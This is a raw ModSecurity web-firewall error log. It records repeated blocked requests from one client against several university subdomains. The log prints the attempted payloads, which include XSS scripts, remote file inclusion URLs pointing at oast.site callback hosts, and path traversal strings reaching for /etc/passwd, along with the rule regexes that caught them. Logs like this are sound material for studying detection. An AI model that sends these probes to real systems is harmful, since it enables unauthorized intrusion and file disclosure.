[Tue Aug 29 11:48:23.455970 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAj12EUAAAAa"]
[Tue Aug 29 11:48:23.458541 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAjtc@0AAAAX"]
[Tue Aug 29 11:48:23.469371 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAkoTjIAAAAH"]
[Tue Aug 29 11:48:23.700813 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAj12EsAAAAa"]
[Tue Aug 29 11:48:23.892400 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gp51bowza3mysg.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gp51bowza3mysg.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14l8Co-f0AAAj12FMAAAAa"]
[Tue Aug 29 11:48:23.911930 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gswmri9xdkbj9b.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gswmri9xdkbj9b.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14l8Co-f0AAAj12FQAAAAa"]
[Tue Aug 29 11:48:23.957963 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAkrz78AAAAC"]
[Tue Aug 29 11:48:23.971665 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gb7377kh8fpr5w.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gb7377kh8fpr5w.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14l8Co-f0AAAkqHp0AAAAM"]
[Tue Aug 29 11:48:24.436041 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14mMCo-f0AAAj12FsAAAAa"]
[Tue Aug 29 11:48:24.440948 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gdx4ixmghq3ypy.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gdx4ixmghq3ypy.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14mMCo-f0AAAjtc-UAAAAX"]
[Tue Aug 29 11:48:24.472795 2023] [:error] [pid 2345] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g9pj7sq13444fq.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26g9pj7sq13444fq.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14mMCo-f0AAAkpFXsAAAAI"]
[Tue Aug 29 11:48:24.474889 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gbog3a75r1o78o.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gbog3a75r1o78o.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14mMCo-f0AAAj12F0AAAAa"]
[Tue Aug 29 11:48:24.533914 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14mMCo-f0AAAj12GAAAAAa"]
[Tue Aug 29 11:48:27.863815 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14m8Co-f0AAAk2KWoAAAAb"]
[Tue Aug 29 11:48:27.863868 2023] [:error] [pid 2362] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14m8Co-f0AAAk6PBUAAAAh"]
[Tue Aug 29 11:48:27.910626 2023] [:error] [pid 2359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14m8Co-f0AAAk3854AAAAe"]
[Tue Aug 29 11:48:27.915819 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14m8Co-f0AAAkwQRcAAAAS"]
[Tue Aug 29 11:48:28.212359 2023] [:error] [pid 2360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14nMCo-f0AAAk4IkMAAAAf"]
[Tue Aug 29 11:48:28.550514 2023] [:error] [pid 2375] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14nMCo-f0AAAlHQoIAAAAm"]
[Tue Aug 29 11:48:31.500493 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAkqHsAAAAAM"]
[Tue Aug 29 11:48:31.653516 2023] [:error] [pid 2349] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAktzFUAAAAP"]
[Tue Aug 29 11:48:31.685122 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAkskr8AAAAN"]
[Tue Aug 29 11:48:31.753592 2023] [:error] [pid 2362] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAk6PBgAAAAh"]
[Tue Aug 29 11:48:31.787244 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14n8Co-f0AAAj12HIAAAAa"]
[Tue Aug 29 11:48:32.364310 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:data[User][username]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:data[User][username]: data[User][username]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/users/login"] [unique_id "ZO14oMCo-f0AAAkyx8kAAAAW"]
[Tue Aug 29 11:48:32.372522 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:data[User][username]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:data[User][username]: data[User][username]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/users/login"] [unique_id "ZO14oMCo-f0AAAk1w6cAAAAY"]
[Tue Aug 29 11:48:32.373586 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:graph: usedMemory</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/monitoring"] [unique_id "ZO14oMCo-f0AAAkAMIQAAAAU"]
[Tue Aug 29 11:48:33.361153 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAkleykAAAAD"]
[Tue Aug 29 11:48:33.431202 2023] [:error] [pid 2345] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14ocCo-f0AAAkpFZEAAAAI"]
